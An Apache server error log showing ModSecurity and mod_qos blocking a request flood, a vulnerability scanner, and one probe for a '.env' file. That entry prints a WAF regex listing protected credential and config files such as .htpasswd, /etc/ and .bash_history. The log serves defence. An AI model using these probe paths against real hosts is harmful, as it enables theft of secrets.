[Tue May 26 19:53:56.429227 2026] [security2:error] [pid 93867:tid 94025] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-5CDfrjqoHpuuBKsBAAAARU"]
[Tue May 26 19:53:56.435141 2026] [security2:error] [pid 93867:tid 94028] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-5CDfrjqoHpuuBKr_QAAARg"]
[Tue May 26 19:53:56.439127 2026] [security2:error] [pid 93867:tid 94040] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-5CDfrjqoHpuuBKsAwAAASQ"]
[Tue May 26 19:53:56.440006 2026] [security2:error] [pid 93576:tid 93762] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-2DRMqfxdEDkoszMLQAAADI"]
[Tue May 26 19:53:56.451372 2026] [security2:error] [pid 86490:tid 86693] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-1ZMwN0DpLVWo6KxFwAAAM4"]
[Tue May 26 19:53:56.451542 2026] [security2:error] [pid 93867:tid 94135] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-5CDfrjqoHpuuBKsFwAAAVY"]
[Tue May 26 19:53:56.455762 2026] [security2:error] [pid 86490:tid 86643] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-1ZMwN0DpLVWo6KxFAAAAJw"]
[Tue May 26 19:53:56.461195 2026] [security2:error] [pid 93576:tid 93818] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-2DRMqfxdEDkoszMJQAAAGo"]
[Tue May 26 19:53:56.463974 2026] [security2:error] [pid 93867:tid 94077] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-5CDfrjqoHpuuBKsEgAAATo"]
[Tue May 26 19:53:56.642453 2026] [security2:error] [pid 86490:tid 86702] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWs_FZMwN0DpLVWo6KxPwAAANc"]
[Tue May 26 19:53:56.660538 2026] [qos:error] [pid 86490:tid 86692] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_FZMwN0DpLVWo6KxjgAAAM0
[Tue May 26 19:53:56.661195 2026] [qos:error] [pid 86490:tid 86741] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_FZMwN0DpLVWo6KxkQAAAP4
[Tue May 26 19:53:56.663905 2026] [qos:error] [pid 86490:tid 86725] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_FZMwN0DpLVWo6KxkwAAAO4
[Tue May 26 19:53:56.663961 2026] [qos:error] [pid 86490:tid 86684] [client 45.148.10.120:34806] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWs_FZMwN0DpLVWo6KxlAAAAMU
[Tue May 26 19:53:56.664469 2026] [qos:error] [pid 86490:tid 86686] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_FZMwN0DpLVWo6KxlQAAAMc
[Tue May 26 19:53:56.668425 2026] [qos:error] [pid 86490:tid 86662] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_FZMwN0DpLVWo6KxlgAAAK8
[Tue May 26 19:53:56.677703 2026] [qos:error] [pid 86490:tid 86645] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs_FZMwN0DpLVWo6KxlwAAAJ4
[Tue May 26 19:53:56.677886 2026] [qos:error] [pid 93576:tid 93817] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs_GDRMqfxdEDkoszMQAAAAGk
[Tue May 26 19:53:56.677897 2026] [qos:error] [pid 86490:tid 86685] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWs_FZMwN0DpLVWo6KxmAAAAMY
[Tue May 26 19:53:56.677961 2026] [qos:error] [pid 93868:tid 94321] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWs_EqK9k_ZUB2Vp25FTQAAAc4
[Tue May 26 19:53:56.810947 2026] [qos:error] [pid 86490:tid 86686] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_FZMwN0DpLVWo6KxnwAAAMc
[Tue May 26 19:53:56.811983 2026] [qos:error] [pid 86490:tid 86662] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_FZMwN0DpLVWo6KxoAAAAK8
[Tue May 26 19:53:56.813447 2026] [qos:error] [pid 86490:tid 86685] [client 45.148.10.120:34806] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_FZMwN0DpLVWo6KxogAAAMY
[Tue May 26 19:53:56.813576 2026] [qos:error] [pid 86490:tid 86645] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_FZMwN0DpLVWo6KxoQAAAJ4
[Tue May 26 19:53:56.816003 2026] [qos:error] [pid 86490:tid 86717] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_FZMwN0DpLVWo6KxowAAAOY
[Tue May 26 19:53:56.821910 2026] [qos:error] [pid 86490:tid 86651] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_FZMwN0DpLVWo6KxpAAAAKQ
[Tue May 26 19:53:56.828898 2026] [qos:error] [pid 93576:tid 93745] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_GDRMqfxdEDkoszMQQAAACE
[Tue May 26 19:53:56.829196 2026] [qos:error] [pid 86490:tid 86621] [client 45.148.10.120:34912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_FZMwN0DpLVWo6KxpQAAAIY
[Tue May 26 19:53:56.830687 2026] [qos:error] [pid 86490:tid 86672] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_FZMwN0DpLVWo6KxpgAAALk
[Tue May 26 19:53:57.052068 2026] [qos:error] [pid 86490:tid 86638] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_VZMwN0DpLVWo6KxrQAAAJc
[Tue May 26 19:53:57.052373 2026] [qos:error] [pid 86490:tid 86653] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_VZMwN0DpLVWo6KxrgAAAKY
[Tue May 26 19:53:57.052765 2026] [qos:error] [pid 86490:tid 86633] [client 45.148.10.120:34912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_VZMwN0DpLVWo6KxrwAAAJI
[Tue May 26 19:53:57.054466 2026] [qos:error] [pid 86490:tid 86684] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_VZMwN0DpLVWo6KxsAAAAMU
[Tue May 26 19:53:57.055072 2026] [qos:error] [pid 93576:tid 93718] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_WDRMqfxdEDkoszMQgAAAAY
[Tue May 26 19:53:57.055522 2026] [qos:error] [pid 86490:tid 86712] [client 45.148.10.120:34806] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_VZMwN0DpLVWo6KxsQAAAOE
[Tue May 26 19:53:57.056336 2026] [qos:error] [pid 86490:tid 86646] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_VZMwN0DpLVWo6KxsgAAAJ8
[Tue May 26 19:53:57.057323 2026] [qos:error] [pid 86490:tid 86686] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_VZMwN0DpLVWo6KxswAAAMc
[Tue May 26 19:53:57.060348 2026] [qos:error] [pid 86490:tid 86662] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_VZMwN0DpLVWo6KxtAAAAK8
[Tue May 26 19:53:57.194852 2026] [qos:error] [pid 86490:tid 86621] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_VZMwN0DpLVWo6KxuAAAAIY
[Tue May 26 19:53:57.202022 2026] [qos:error] [pid 86490:tid 86672] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_VZMwN0DpLVWo6KxuQAAALk
[Tue May 26 19:53:57.203697 2026] [qos:error] [pid 86490:tid 86698] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_VZMwN0DpLVWo6KxugAAANM
[Tue May 26 19:53:57.204426 2026] [qos:error] [pid 93576:tid 93734] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_WDRMqfxdEDkoszMQwAAABY
[Tue May 26 19:53:57.205354 2026] [qos:error] [pid 86490:tid 86735] [client 45.148.10.120:34912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_VZMwN0DpLVWo6KxuwAAAPg
[Tue May 26 19:53:57.206228 2026] [qos:error] [pid 86490:tid 86702] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_VZMwN0DpLVWo6KxvAAAANc
[Tue May 26 19:53:57.207738 2026] [qos:error] [pid 86490:tid 86693] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_VZMwN0DpLVWo6KxvQAAAM4
[Tue May 26 19:53:57.210219 2026] [qos:error] [pid 86490:tid 86727] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_VZMwN0DpLVWo6KxvgAAAPA
[Tue May 26 19:53:57.213061 2026] [qos:error] [pid 86490:tid 86661] [client 45.148.10.120:34806] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_VZMwN0DpLVWo6KxvwAAAK4
[Tue May 26 19:53:57.213722 2026] [qos:error] [pid 86490:tid 86625] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_VZMwN0DpLVWo6KxwAAAAIo
[Tue May 26 19:53:57.234196 2026] [security2:error] [pid 93868:tid 94305] [client 185.177.72.53:63430] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/weather-app/server/.env"] [unique_id "ahWs_UqK9k_ZUB2Vp25FUQAAAb4"]
[Tue May 26 19:53:57.280912 2026] [security2:error] [pid 93867:tid 94033] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-5CDfrjqoHpuuBKsFgAAAR0"]
[Tue May 26 19:53:57.291310 2026] [security2:error] [pid 93868:tid 94374] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-0qK9k_ZUB2Vp25FMAAAAgM"]
[Tue May 26 19:53:57.291405 2026] [security2:error] [pid 93867:tid 94031] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-5CDfrjqoHpuuBKsBwAAARs"]
[Tue May 26 19:53:57.298150 2026] [security2:error] [pid 93867:tid 94216] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-5CDfrjqoHpuuBKsGwAAAXo"]
[Tue May 26 19:53:57.305321 2026] [security2:error] [pid 93868:tid 94289] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-0qK9k_ZUB2Vp25FMQAAAa4"]
[Tue May 26 19:53:57.305992 2026] [security2:error] [pid 93867:tid 94237] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-5CDfrjqoHpuuBKsBQAAAYQ"]
[Tue May 26 19:53:57.307679 2026] [security2:error] [pid 93867:tid 94064] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-5CDfrjqoHpuuBKsCAAAATQ"]
[Tue May 26 19:53:57.308782 2026] [security2:error] [pid 86490:tid 86689] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-1ZMwN0DpLVWo6KxEwAAAMo"]
[Tue May 26 19:53:57.312047 2026] [security2:error] [pid 93868:tid 94268] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-0qK9k_ZUB2Vp25FNgAAAZk"]
[Tue May 26 19:53:57.316751 2026] [security2:error] [pid 93576:tid 93733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-2DRMqfxdEDkoszMLAAAABU"]
[Tue May 26 19:53:57.326007 2026] [security2:error] [pid 93867:tid 94176] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-5CDfrjqoHpuuBKsEAAAAWg"]
[Tue May 26 19:53:57.349231 2026] [security2:error] [pid 93867:tid 94212] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-5CDfrjqoHpuuBKsDwAAAXg"]
[Tue May 26 19:53:57.367115 2026] [security2:error] [pid 93867:tid 94149] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-5CDfrjqoHpuuBKsGAAAAVw"]
[Tue May 26 19:53:57.367709 2026] [security2:error] [pid 93867:tid 94203] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-5CDfrjqoHpuuBKsEQAAAXQ"]
[Tue May 26 19:53:57.377319 2026] [security2:error] [pid 86490:tid 86680] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_FZMwN0DpLVWo6KxUAAAAME"]
[Tue May 26 19:53:57.378749 2026] [security2:error] [pid 93867:tid 94183] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-5CDfrjqoHpuuBKsFAAAAWs"]
[Tue May 26 19:53:57.387151 2026] [security2:error] [pid 86490:tid 86678] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_FZMwN0DpLVWo6KxUQAAAL8"]
[Tue May 26 19:53:57.390168 2026] [security2:error] [pid 93867:tid 94192] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-5CDfrjqoHpuuBKsHAAAAW8"]
[Tue May 26 19:53:57.391891 2026] [security2:error] [pid 93867:tid 94118] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-5CDfrjqoHpuuBKsHgAAAU4"]
[Tue May 26 19:53:57.392870 2026] [security2:error] [pid 93867:tid 94053] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-5CDfrjqoHpuuBKsEwAAAS8"]
[Tue May 26 19:53:57.406418 2026] [security2:error] [pid 86490:tid 86699] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_FZMwN0DpLVWo6KxUwAAANQ"]
[Tue May 26 19:53:57.407227 2026] [security2:error] [pid 86490:tid 86716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_FZMwN0DpLVWo6KxYAAAAOU"]
[Tue May 26 19:53:57.415812 2026] [security2:error] [pid 86490:tid 86620] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-1ZMwN0DpLVWo6KxHgAAAIU"]
[Tue May 26 19:53:57.421666 2026] [security2:error] [pid 86490:tid 86721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_FZMwN0DpLVWo6KxVgAAAOo"]
[Tue May 26 19:53:57.431200 2026] [security2:error] [pid 86490:tid 86688] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_FZMwN0DpLVWo6KxXwAAAMk"]
[Tue May 26 19:53:57.446377 2026] [security2:error] [pid 86490:tid 86677] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_FZMwN0DpLVWo6KxYgAAAL4"]
[Tue May 26 19:53:57.451956 2026] [security2:error] [pid 86490:tid 86715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-1ZMwN0DpLVWo6KxHQAAAOQ"]
[Tue May 26 19:53:57.533737 2026] [security2:error] [pid 93576:tid 93763] [client 3.237.65.43:54515] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 43.65.237.3.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.jailanitradingcompany.com"] [uri "/images/images/cache.php"] [unique_id "ahWs_WDRMqfxdEDkoszMRgAAADM"], referer: www.google.com
[Tue May 26 19:53:57.543109 2026] [qos:error] [pid 93868:tid 94341] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs_UqK9k_ZUB2Vp25FXAAAAeI
[Tue May 26 19:53:57.549117 2026] [qos:error] [pid 93867:tid 94171] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs_ZCDfrjqoHpuuBKsOQAAAWY
[Tue May 26 19:53:57.550055 2026] [qos:error] [pid 93576:tid 93811] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_WDRMqfxdEDkoszMSwAAAGM
[Tue May 26 19:53:57.557685 2026] [qos:error] [pid 86490:tid 86630] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_VZMwN0DpLVWo6KyBwAAAI8
[Tue May 26 19:53:57.563313 2026] [qos:error] [pid 93576:tid 93780] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_WDRMqfxdEDkoszMTAAAAEQ
[Tue May 26 19:53:57.567402 2026] [qos:error] [pid 86490:tid 86677] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_VZMwN0DpLVWo6KyCAAAAL4
[Tue May 26 19:53:57.574019 2026] [qos:error] [pid 86490:tid 86671] [client 45.148.10.120:34984] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_VZMwN0DpLVWo6KyCQAAALg
[Tue May 26 19:53:57.583574 2026] [qos:error] [pid 86490:tid 86655] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_VZMwN0DpLVWo6KyCgAAAKg
[Tue May 26 19:53:57.601697 2026] [qos:error] [pid 93576:tid 93813] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_WDRMqfxdEDkoszMTgAAAGU
[Tue May 26 19:53:57.603542 2026] [qos:error] [pid 86490:tid 86679] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_VZMwN0DpLVWo6KyCwAAAMA
[Tue May 26 19:53:57.733537 2026] [qos:error] [pid 86490:tid 86737] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_VZMwN0DpLVWo6KyDwAAAPo
[Tue May 26 19:53:57.737157 2026] [qos:error] [pid 93576:tid 93822] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_WDRMqfxdEDkoszMTwAAAG4
